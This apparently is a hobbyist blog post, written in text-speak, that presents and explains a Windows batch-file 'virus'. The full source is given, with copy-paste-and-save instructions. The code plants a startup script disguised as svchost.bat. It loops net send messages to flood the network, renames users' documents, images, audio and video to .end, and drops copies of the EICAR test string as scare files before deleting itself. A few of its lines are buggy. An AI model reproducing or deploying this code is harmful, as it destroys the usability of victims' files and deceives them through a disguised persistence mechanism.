It's every one's dream 2 create a virus. It took me long but here it is my first ever virus. I M not a programmer so this is quite simple, but it is dangerous so don't use it. It is just 4 educational purpose & 2 brag about. It does not spread itself through D net. it doesn't infects or copies itself.
On execution it creates a file which loads on next boot up. Also it creates backups of files in .nrk format in different folders in C drive. Then it deleted itself.
D file created copies D backup files in other folders & rename them with proper extensions. One file floods D network of D user. second one change D extension of all picture, video & audio files 2 .end. D last file actually is a virus string detected by all antivirus which causes a panic 2 D user.
Being a batch file is quite simple & U can understand D code easily.
So her is D virus code.
@echo off
:: Y0UR_(0MPU73R_15_D34D
:: 7H15_15_MY_H4PPY_3ND1N6_/1RU5
:: H0P3_Y0U_L1K3_17
:: (0MPL3M3N75_FR0M
:: NRK89
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat" goto d13
echo @echo off > "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo if exist "C:\WINDOWS\AppPatch\cnet.bat" goto 8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\msagent\cnet.nrk" "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :8ln7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Program Files\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "C:\Documents and Settings\%username%\Desktop\HACKED_BY_NRK89.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\security\end.nrk" "D:\HAPPY_END.exe" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo if exist "C:\WINDOWS\Config\extn.bat" goto ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo copy "C:\WINDOWS\Registration\extn.nrk" "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo :ch3x7 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo satrt "C:\WINDOWS\AppPatch\cnet.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo start "C:\WINDOWS\Config\extn.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
echo @echo off > "C:\WINDOWS\system32\cnet.nrk"
echo color 04 >> "C:\WINDOWS\system32\cnet.nrk"
echo :hit >> "C:\WINDOWS\system32\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo net send * WORKGROUP ENABLED >> "C:\WINDOWS\msagent\cnet.nrk"
echo goto hit >> "C:\WINDOWS\msagent\cnet.nrk"
echo X5O!P%@AP[4\PZX54(P^)7CC)7}$ There will be no more HAPPY ENDING in your life from now $H+H* > "C:\WINDOWS\security\end.nrk"
echo @echo off > "C:\WINDOWS\Registration\extn.nrk"
echo ren *.txt *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.doc *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.jpeg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.bmp *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.gif *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.ico *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mpg *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.mp3 *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.avi *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo ren *.wmv *.end >> "C:\WINDOWS\Registration\extn.nrk"
echo exit >> "C:\WINDOWS\Registration\extn.nrk"
:d13
del %0
Copy & Paste D code in Notepad & save it as happy.bat (U can save it with any name but 4 now save it as happy.bat)
Now what does D virus does?
First it creates a file named svchost.bat in Startup Folder, so that it starts on every boot up.
Then it creates multiple files including cnet.nrk, end.nrk & extn.nrk in different folders in C:/WINDOWS/
Last D virus deletes D original file, hence U have 2 name it happy.bat.
If U want 2 change D name of D virus then place D same name on D last line (del happy.bat)
P.S.- It'll not format D Hard Drive but I'll render D files useless, so don't use it on others' computer.
No comments:
Post a Comment